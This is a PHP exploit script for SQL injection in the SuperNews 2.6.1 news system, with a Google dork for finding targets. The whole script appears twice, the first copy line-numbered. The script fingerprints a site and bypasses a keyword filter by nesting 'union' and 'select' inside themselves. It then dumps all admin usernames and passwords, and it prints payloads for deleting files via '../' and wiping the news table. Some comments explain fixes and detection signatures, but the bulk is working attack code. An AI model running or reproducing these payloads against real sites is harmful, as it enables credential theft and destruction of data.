1.<?php 
2.# Exploit Title: Supernews <= 2.6.1 SQL 注入漏洞 
3.# Google Dork: intext:"2003 - 2004 : SuperNews : Todos os direitos reservados" 
4.# Version: 2.6.1 
5.# Tested on: Debian GNU/Linux 
6.7./* 
8.Exploit for educational purpose only. 
9.Note sent to the developer Fernando Pontes by e-mail 90@08sec.com 
10. 
11.SuperNews are a brazilian news system in PHP and MySQL. 
12.Versions priors to 2.6 have a simple SQL Injection on view news. 
13.The developer tried to fix the bug removing keywords like "union" and "select". 
14.But, with a recursion, it's possible to bypass this filters. See: 
15.seselectlect 
16.After removing "select" word, will stay another "select" word. See more: 
17.seSELECTlect 
18. 
19.Another SQL Injection on the administration panel: 
20.When deleting a post, you can inject SQL for delete all news on the database. 
21. 
22.Another vulnerability allows to delete files, on the administration panel: 
23.When deleting a post, a variable called "unlink" will talk to the system the new's image for delete. 
24.But it's possible to delete others files, typing all the file path or using "../". 
25. 
26.Usage: 
27.php exploit.php http://www.unhonker.com/supernews/ 
28. 
29.For more info about vulnerabilities: 
30.php exploit.php moreinfo 
31. 
32.Example: 
33.$ php exploit.php http://www.unhonker.com/news/ 
34. 
35.Supernews <= 2.6.1 SQL Injection Exploit 
36. 
37. 
38.1.Trying to access server... 
39.1.Detecting version... 😮 
40.[!] Version: >2.6.1 🙂 
41.[!] Administration panel: http://www.unhonker.com/news/admin/adm_noticias.php 
42. Type "exploit.php moreinfo" for get others vulnerabilities. 
43.1.Getting user & pass 8-] 
44.User: user1 
45.Pass: pass1 
46. 
47.User: user2 
48.Pass: pass2 
49. 
50.Good luck! 😀 
51. 
52.*/ 
// Hide everything below E_ERROR: the script depends on silent warnings
// (undefined $get[1][0] on a regex miss, failed file_get_contents()),
// removes the execution time limit for the per-row request loop, and caps
// each socket wait at 30 s so a stalled host does not hang it forever.
error_reporting(E_ERROR);
set_time_limit(0);
@ini_set("default_socket_timeout", 30);
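/**
 * Render a byte string as a MySQL-style hexadecimal literal ("0x…").
 *
 * Every byte becomes exactly two hex digits so the literal decodes to the
 * same bytes on the server. A per-byte dechex(ord()) emits a single digit
 * for bytes below 0x10 and shifts every following byte by a nibble, which
 * is why bin2hex() is used. The empty string yields "0x".
 *
 * @param string $string raw bytes to encode
 * @return string "0x" followed by lowercase hex, two digits per byte
 */
function hex(string $string): string
{
    return '0x' . bin2hex($string);
}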
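/**
 * Replace every other occurrence of $needle in $haystack with $replace.
 *
 * Hits are counted left to right on the progressively rewritten string.
 * With $replace_first true the 1st, 3rd, 5th … hits are replaced; with
 * false the 2nd, 4th, 6th …. $count exists for signature compatibility
 * only: it is not a reference parameter, so the caller never sees the
 * tally. An empty $needle leaves $haystack unchanged instead of looping.
 *
 * @param string   $needle        substring to look for
 * @param string   $replace       replacement text (may be empty)
 * @param string   $haystack      subject string
 * @param int|null $count         ignored (kept for compatibility)
 * @param bool     $replace_first replace odd (true) or even (false) hits
 * @return string the rewritten string; unchanged when $needle is absent
 */
function str_replace_every_other($needle, $replace, $haystack, $count=null, $replace_first=true) {
    $count = 0;
    $needleLen = strlen($needle);
    // strpos() with an empty needle matches at every position; bail out
    // rather than inserting $replace forever.
    if ($needleLen === 0) {
        return $haystack;
    }
    $offset = strpos($haystack, $needle);
    // Skip the first hit when asked to. The not-found case must be guarded:
    // adding $needleLen to `false` produced an offset that can lie past the
    // end of a short haystack, and strpos() throws ValueError for that.
    if (!$replace_first && $offset !== false) {
        $offset = strpos($haystack, $needle, $offset + $needleLen);
    }
    while ($offset !== false) {
        $haystack = substr_replace($haystack, $replace, $offset, $needleLen);
        $count++;
        // Resume after the replacement text, then step over the next hit —
        // that one is kept.
        $offset = strpos($haystack, $needle, $offset + strlen($replace));
        if ($offset !== false) {
            $offset = strpos($haystack, $needle, $offset + $needleLen);
        }
    }
    return $haystack;
}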
/**
 * Drop every even-numbered "(.*)" capture group from a regex string,
 * keeping the 1st, 3rd, 5th … intact (the first is deliberately skipped).
 *
 * @param string $str regex text containing "(.*)" groups
 * @return string the regex with alternate groups removed
 */
function removeaddregex($str) {
  $group = '(.*)';
  $thinned = str_replace_every_other($group, '', $str, null, false);
  return $thinned;
}
/**
 * Backslash-escape the PCRE metacharacters this script cares about.
 *
 * A hand-rolled subset of preg_quote(): it escapes
 * \ . + * ? [ ^ ] $ ( ) { } = ! < > | :  and, unlike the builtin, leaves
 * "-", "#", "/" and NUL untouched. A single strtr() pass suffices: no
 * escaped output contains another listed character except the backslash,
 * which is itself escaped in the same pass.
 *
 * @param string $str text to embed in a pattern
 * @return string the escaped text
 */
function preg_quote_working($str) {
  $meta = ['\\', '.', '+', '*', '?', '[', '^', ']', '$', '(', ')', '{', '}', '=', '!', '<', '>', '|', ':'];
  $map = [];
  foreach ($meta as $m) {
    $map[$m] = '\\' . $m;
  }
  return strtr($str, $map);
}
echo "\nSupernews <= 2.6.1 SQL Injection Exploit";
echo "\nCoded by 08sec - www.08sec.com\nUse at your own risk.\n\n";

// Exactly one argument is accepted: either the target's base URL or the
// literal "moreinfo". Any other argument count prints usage and exits.
if($argc!=2) {
  echo "Usage:
php $argv[0] url
Example:
php $argv[0] http://www.unhonker.com/supernews
php $argv[0] https://www.unhonker.com/supernews/";
  exit;
}

// "moreinfo" only prints the advisory text for the two admin-panel issues
// (file deletion through the "unlink" parameter and SQL injection through
// "deleta"); it sends no request. The text describes the first as
// post-login and the second lives in the same admin script, so presumably
// both need an admin session. Mitigation is validating "unlink" against
// the upload directory and binding "deleta" in a prepared statement, not
// just stronger admin passwords.
if($argv[1]=="moreinfo") {
  echo "\nMore vulnerabilities:
 - Deleting files
  You can delete files on the server, after login, using the URL:
   http://server.com/admin/adm_noticias.php?deleta=ID&unlink=FILE
  Replace \"ID\" with a valid post ID (will be deleted) and FILE with the file address on the server.
 
 - Deleting all news on the database:
  You can delete all news on the database with one request, only. Look:
   http://server.com/admin/adm_noticias.php?deleta=0%20or%201=1--+
 
  All vulnerabilities discovered by WCGroup.\n";
  exit;
}
// Normalise the base URL to end with "/" so the script paths below append
// cleanly.
$uri = $argv[1];
if(substr($uri, -1, 1)!="/") {
  $uri .= "/";
}
// Injection point: the "noticia" query parameter of noticias.php. The value
// starts with "-1" followed by a literal "+" (a space once decoded), so
// whatever is appended later lands inside the SQL statement — presumably
// after an unquoted numeric id; the server-side query is not visible here.
$url = $uri."noticias.php?noticia=".urlencode("-1")."+";
echo "\n• Trying to access server...";
// One probe of the guessed path. On a failed fetch, an empty or "0" body
// (loose == false), or a body containing "404" or a raw "mysql_query"
// error, fall back to index.php with the same parameter. The check is on
// the body text, not the HTTP status, so a page that merely mentions "404"
// is misclassified. A raw mysql_query message reaching the client is itself
// a finding: database errors belong in server logs, never in the response.
$accessvr = @file_get_contents($url);
if(($accessvr==false) OR (preg_match("/(404|mysql_query)/", $accessvr))) {
  $url = $uri."index.php?noticia=".urlencode("-1")."+";
}
// Marker the server must echo back for the injected clause to count as
// executed: 10 hex chars of md5 over one random byte. It is a canary, not a
// secret, which is the only reason rand() (not a CSPRNG) is tolerable here.
// Being hex-only, it is also safe to interpolate unescaped into the regexes
// below.
$token = substr(md5(chr(rand(48, 122))), 0, 10);

echo "\n• Detecting version... :-o";

// Version fingerprint by behaviour rather than by banner. First try a plain
// UNION; if the marker comes back, no keyword filtering is in place (the
// branch this script labels ">2.6.1"). Otherwise retry with each keyword
// doubled ("uniunionon", "seleselectct"): a filter that strips "union"/
// "select" in a single pass leaves the inner copy intact, which is the
// 2.6.1 behaviour described in the header comment. The two probes also
// assume different column counts (7 vs 8). For detection, both request
// shapes are the log signature: a "noticia" value containing UNION/SELECT,
// or a keyword with itself spliced inside. The durable fix is a prepared
// statement with the id bound as an integer; keyword blacklists are
// bypassed exactly like this.
$gettoken = strip_tags(file_get_contents($url.urlencode("union all select 1,2,3,4,".hex($token).",6,7-- ")));
if(preg_match("/".$token."/", $gettoken)) {
  echo "\n[!] Version: >2.6.1 :-)";
  $version = 1;
} else {
  $gettoken = strip_tags(file_get_contents($url.urlencode("uniunionon seleselectct 1,2,3,4,5,".hex($token).",7,8-- ")));
  if(preg_match("/".$token."/", $gettoken)) {
    echo "\n[!] Version =2.6.1 :-)";
    $version = 2;
  } else {
    echo "\n[-] Unknown version :-S";
    $version = 3;
  }
}
// The ">2.6.1" label is the script's own wording; the header states that
// only versions <= 2.6.1 are affected, so the two statements disagree.
if($version!=3) {
  echo "\n[!] Administration panel: {$uri}admin/adm_noticias.php";
  echo "\n Type \"$argv[0] moreinfo\" for get others vulnerabilities.";
  echo "\n• Getting user & pass 8-]";
}
// Row-by-row enumeration of supernews_login (LIMIT $i,1 per request) until
// a response carries no marker-delimited user/pass pair. The two branches
// differ only in the payload shape chosen during detection and could share
// one loop. Termination relies on the regex failing: a network error, a WAF
// block or an unexpected page layout all read as "no more rows", so an
// empty listing does not prove the table is empty. $get[1][0] is an
// undefined index on a miss; that notice is hidden by error_reporting()
// above. The greedy "(.*)" captures work only because "." does not cross
// newlines and the marker is unlikely to appear elsewhere in the page.
// Whatever the table holds is printed verbatim: if passwords are stored
// unhashed they are exposed directly, so storing only password_hash()
// digests is a second, independent mitigation.
if($version==1) {
  $i = 0;
  while(true) {
    $request = strip_tags(file_get_contents($url.urlencode("union all select 1,2,3,4,concat(".hex($token).",user,".hex($token).",pass,".hex($token)."),6,7 from supernews_login limit $i,1-- ")));
    preg_match_all("/$token(.*)$token(.*)$token/", $request, $get);
    if($get[1][0]!="") {
      $user = $get[1][0];
      $pass = $get[2][0];
      echo "\nUser: $user\nPass: $pass\n";
      $i++;
    } else {
      echo "\nGood luck! :-D";
      break;
    }
  }
}
elseif($version==2) {
  $i = 0;
  while(true) {
    $request = strip_tags(file_get_contents($url.urlencode("uniunionon seleselectct 1,2,3,4,5,concat(".hex($token).",user,".hex($token).",pass,".hex($token)."),7,8 from supernews_login limit $i,1-- ")));
    preg_match_all("/$token(.*)$token(.*)$token/", $request, $get);
    if($get[1][0]!="") {
      $user = $get[1][0];
      $pass = $get[2][0];
      echo "\nUser: $user\nPass: $pass\n";
      $i++;
    } else {
      echo "\nGood luck! :-D";
      break;
    }
  }
}
else {
  // Neither probe echoed the marker: unknown version, another CMS, or a
  // request filter in front of the application.
  echo "\n\nThis site are using an unknown version of Supernews or another CMS.";
  echo "\nPlease note that only versions <= 2.6.1 of Supernews are vulnerable.";
  echo "\nWebservers with modules or firewalls like \"mod_security\" aren't vulnerables.";
  echo "\nIf you want, try to access manually:";
  echo "\nThe vulnerability are on view notice file (index.php or noticia.php), in variable \"noticia\", a simple SQL Injection.";
  echo "\nWe're sorry.";
}

echo "\n";
203.<?php
# Exploit Title: Supernews <= 2.6.1 SQL 注入漏洞
# Google Dork: intext:"2003 - 2004 : SuperNews : Todos os direitos reservados"
# Version: 2.6.1
# Tested on: Debian GNU/Linux
 
/*
Exploit for educational purpose only.
Note sent to the developer Fernando Pontes by e-mail 90@08sec.com
 
SuperNews is a Brazilian news system written in PHP and MySQL.
Versions prior to 2.6 have a simple SQL injection in the view-news page.
The developer tried to fix the bug by removing keywords like "union" and "select".
But, by nesting the keyword inside itself, it's possible to bypass this filter. See:
seselectlect
After the "select" word is removed, another "select" word remains. Another example:
seSELECTlect
 
Another SQL Injection on the administration panel:
When deleting a post, you can inject SQL to delete all news in the database.
 
Another vulnerability allows to delete files, on the administration panel:
When deleting a post, a variable called "unlink" tells the system which image of the news item to delete.
But it's possible to delete other files by supplying a full file path or using "../".
 
Usage:
php exploit.php http://www.unhonker.com/supernews/
 
For more info about vulnerabilities:
php exploit.php moreinfo
 
Example:
$ php exploit.php http://www.unhonker.com/news/
 
Supernews <= 2.6.1 SQL Injection Exploit
 
 • Trying to access server...
 • Detecting version... 😮
[!] Version: >2.6.1 🙂
[!] Administration panel: http://www.unhonker.com/news/admin/adm_noticias.php
 Type "exploit.php moreinfo" for get others vulnerabilities.
 • Getting user & pass 8-]
User: user1
Pass: pass1
 
User: user2
Pass: pass2
 
Good luck! 😀
 
*/
 
// Hide everything below E_ERROR: the script depends on silent warnings
// (undefined $get[1][0] on a regex miss, failed file_get_contents()),
// removes the execution time limit for the per-row request loop, and caps
// each socket wait at 30 s so a stalled host does not hang it forever.
error_reporting(E_ERROR);
set_time_limit(0);
@ini_set("default_socket_timeout", 30);
 
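/**
 * Render a byte string as a MySQL-style hexadecimal literal ("0x…").
 *
 * Every byte becomes exactly two hex digits so the literal decodes to the
 * same bytes on the server. A per-byte dechex(ord()) emits a single digit
 * for bytes below 0x10 and shifts every following byte by a nibble, which
 * is why bin2hex() is used. The empty string yields "0x".
 *
 * @param string $string raw bytes to encode
 * @return string "0x" followed by lowercase hex, two digits per byte
 */
function hex(string $string): string
{
    return '0x' . bin2hex($string);
}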
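/**
 * Replace every other occurrence of $needle in $haystack with $replace.
 *
 * Hits are counted left to right on the progressively rewritten string.
 * With $replace_first true the 1st, 3rd, 5th … hits are replaced; with
 * false the 2nd, 4th, 6th …. $count exists for signature compatibility
 * only: it is not a reference parameter, so the caller never sees the
 * tally. An empty $needle leaves $haystack unchanged instead of looping.
 *
 * @param string   $needle        substring to look for
 * @param string   $replace       replacement text (may be empty)
 * @param string   $haystack      subject string
 * @param int|null $count         ignored (kept for compatibility)
 * @param bool     $replace_first replace odd (true) or even (false) hits
 * @return string the rewritten string; unchanged when $needle is absent
 */
function str_replace_every_other($needle, $replace, $haystack, $count=null, $replace_first=true) {
    $count = 0;
    $needleLen = strlen($needle);
    // strpos() with an empty needle matches at every position; bail out
    // rather than inserting $replace forever.
    if ($needleLen === 0) {
        return $haystack;
    }
    $offset = strpos($haystack, $needle);
    // Skip the first hit when asked to. The not-found case must be guarded:
    // adding $needleLen to `false` produced an offset that can lie past the
    // end of a short haystack, and strpos() throws ValueError for that.
    if (!$replace_first && $offset !== false) {
        $offset = strpos($haystack, $needle, $offset + $needleLen);
    }
    while ($offset !== false) {
        $haystack = substr_replace($haystack, $replace, $offset, $needleLen);
        $count++;
        // Resume after the replacement text, then step over the next hit —
        // that one is kept.
        $offset = strpos($haystack, $needle, $offset + strlen($replace));
        if ($offset !== false) {
            $offset = strpos($haystack, $needle, $offset + $needleLen);
        }
    }
    return $haystack;
}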
/**
 * Drop every even-numbered "(.*)" capture group from a regex string,
 * keeping the 1st, 3rd, 5th … intact (the first is deliberately skipped).
 *
 * @param string $str regex text containing "(.*)" groups
 * @return string the regex with alternate groups removed
 */
function removeaddregex($str) {
  $group = '(.*)';
  $thinned = str_replace_every_other($group, '', $str, null, false);
  return $thinned;
}
/**
 * Backslash-escape the PCRE metacharacters this script cares about.
 *
 * A hand-rolled subset of preg_quote(): it escapes
 * \ . + * ? [ ^ ] $ ( ) { } = ! < > | :  and, unlike the builtin, leaves
 * "-", "#", "/" and NUL untouched. A single strtr() pass suffices: no
 * escaped output contains another listed character except the backslash,
 * which is itself escaped in the same pass.
 *
 * @param string $str text to embed in a pattern
 * @return string the escaped text
 */
function preg_quote_working($str) {
  $meta = ['\\', '.', '+', '*', '?', '[', '^', ']', '$', '(', ')', '{', '}', '=', '!', '<', '>', '|', ':'];
  $map = [];
  foreach ($meta as $m) {
    $map[$m] = '\\' . $m;
  }
  return strtr($str, $map);
}
 
echo "\nSupernews <= 2.6.1 SQL Injection Exploit";
echo "\nCoded by 08sec - www.08sec.com\nUse at your own risk.\n\n";

// Exactly one argument is accepted: either the target's base URL or the
// literal "moreinfo". Any other argument count prints usage and exits.
if($argc!=2) {
  echo "Usage:
php $argv[0] url
Example:
php $argv[0] http://www.unhonker.com/supernews
php $argv[0] https://www.unhonker.com/supernews/";
  exit;
}

// "moreinfo" only prints the advisory text for the two admin-panel issues
// (file deletion through the "unlink" parameter and SQL injection through
// "deleta"); it sends no request. The text describes the first as
// post-login and the second lives in the same admin script, so presumably
// both need an admin session. Mitigation is validating "unlink" against
// the upload directory and binding "deleta" in a prepared statement, not
// just stronger admin passwords.
if($argv[1]=="moreinfo") {
  echo "\nMore vulnerabilities:
 - Deleting files
  You can delete files on the server, after login, using the URL:
   http://server.com/admin/adm_noticias.php?deleta=ID&unlink=FILE
  Replace \"ID\" with a valid post ID (will be deleted) and FILE with the file address on the server.
 
 - Deleting all news on the database:
  You can delete all news on the database with one request, only. Look:
   http://server.com/admin/adm_noticias.php?deleta=0%20or%201=1--+
 
  All vulnerabilities discovered by WCGroup.\n";
  exit;
}
 
// Normalise the base URL to end with "/" so the script paths below append
// cleanly.
$uri = $argv[1];
if(substr($uri, -1, 1)!="/") {
  $uri .= "/";
}
// Injection point: the "noticia" query parameter of noticias.php. The value
// starts with "-1" followed by a literal "+" (a space once decoded), so
// whatever is appended later lands inside the SQL statement — presumably
// after an unquoted numeric id; the server-side query is not visible here.
$url = $uri."noticias.php?noticia=".urlencode("-1")."+";
echo "\n• Trying to access server...";
// One probe of the guessed path. On a failed fetch, an empty or "0" body
// (loose == false), or a body containing "404" or a raw "mysql_query"
// error, fall back to index.php with the same parameter. The check is on
// the body text, not the HTTP status, so a page that merely mentions "404"
// is misclassified. A raw mysql_query message reaching the client is itself
// a finding: database errors belong in server logs, never in the response.
$accessvr = @file_get_contents($url);
if(($accessvr==false) OR (preg_match("/(404|mysql_query)/", $accessvr))) {
  $url = $uri."index.php?noticia=".urlencode("-1")."+";
}
 
// Marker the server must echo back for the injected clause to count as
// executed: 10 hex chars of md5 over one random byte. It is a canary, not a
// secret, which is the only reason rand() (not a CSPRNG) is tolerable here.
// Being hex-only, it is also safe to interpolate unescaped into the regexes
// below.
$token = substr(md5(chr(rand(48, 122))), 0, 10);

echo "\n• Detecting version... :-o";

// Version fingerprint by behaviour rather than by banner. First try a plain
// UNION; if the marker comes back, no keyword filtering is in place (the
// branch this script labels ">2.6.1"). Otherwise retry with each keyword
// doubled ("uniunionon", "seleselectct"): a filter that strips "union"/
// "select" in a single pass leaves the inner copy intact, which is the
// 2.6.1 behaviour described in the header comment. The two probes also
// assume different column counts (7 vs 8). For detection, both request
// shapes are the log signature: a "noticia" value containing UNION/SELECT,
// or a keyword with itself spliced inside. The durable fix is a prepared
// statement with the id bound as an integer; keyword blacklists are
// bypassed exactly like this.
$gettoken = strip_tags(file_get_contents($url.urlencode("union all select 1,2,3,4,".hex($token).",6,7-- ")));
if(preg_match("/".$token."/", $gettoken)) {
  echo "\n[!] Version: >2.6.1 :-)";
  $version = 1;
} else {
  $gettoken = strip_tags(file_get_contents($url.urlencode("uniunionon seleselectct 1,2,3,4,5,".hex($token).",7,8-- ")));
  if(preg_match("/".$token."/", $gettoken)) {
    echo "\n[!] Version =2.6.1 :-)";
    $version = 2;
  } else {
    echo "\n[-] Unknown version :-S";
    $version = 3;
  }
}
// The ">2.6.1" label is the script's own wording; the header states that
// only versions <= 2.6.1 are affected, so the two statements disagree.
if($version!=3) {
  echo "\n[!] Administration panel: {$uri}admin/adm_noticias.php";
  echo "\n Type \"$argv[0] moreinfo\" for get others vulnerabilities.";
  echo "\n• Getting user & pass 8-]";
}
 
// Row-by-row enumeration of supernews_login (LIMIT $i,1 per request) until
// a response carries no marker-delimited user/pass pair. The two branches
// differ only in the payload shape chosen during detection and could share
// one loop. Termination relies on the regex failing: a network error, a WAF
// block or an unexpected page layout all read as "no more rows", so an
// empty listing does not prove the table is empty. $get[1][0] is an
// undefined index on a miss; that notice is hidden by error_reporting()
// above. The greedy "(.*)" captures work only because "." does not cross
// newlines and the marker is unlikely to appear elsewhere in the page.
// Whatever the table holds is printed verbatim: if passwords are stored
// unhashed they are exposed directly, so storing only password_hash()
// digests is a second, independent mitigation.
if($version==1) {
  $i = 0;
  while(true) {
    $request = strip_tags(file_get_contents($url.urlencode("union all select 1,2,3,4,concat(".hex($token).",user,".hex($token).",pass,".hex($token)."),6,7 from supernews_login limit $i,1-- ")));
    preg_match_all("/$token(.*)$token(.*)$token/", $request, $get);
    if($get[1][0]!="") {
      $user = $get[1][0];
      $pass = $get[2][0];
      echo "\nUser: $user\nPass: $pass\n";
      $i++;
    } else {
      echo "\nGood luck! :-D";
      break;
    }
  }
}
elseif($version==2) {
  $i = 0;
  while(true) {
    $request = strip_tags(file_get_contents($url.urlencode("uniunionon seleselectct 1,2,3,4,5,concat(".hex($token).",user,".hex($token).",pass,".hex($token)."),7,8 from supernews_login limit $i,1-- ")));
    preg_match_all("/$token(.*)$token(.*)$token/", $request, $get);
    if($get[1][0]!="") {
      $user = $get[1][0];
      $pass = $get[2][0];
      echo "\nUser: $user\nPass: $pass\n";
      $i++;
    } else {
      echo "\nGood luck! :-D";
      break;
    }
  }
}
else {
  // Neither probe echoed the marker: unknown version, another CMS, or a
  // request filter in front of the application.
  echo "\n\nThis site are using an unknown version of Supernews or another CMS.";
  echo "\nPlease note that only versions <= 2.6.1 of Supernews are vulnerable.";
  echo "\nWebservers with modules or firewalls like \"mod_security\" aren't vulnerables.";
  echo "\nIf you want, try to access manually:";
  echo "\nThe vulnerability are on view notice file (index.php or noticia.php), in variable \"noticia\", a simple SQL Injection.";
  echo "\nWe're sorry.";
}

echo "\n";
 
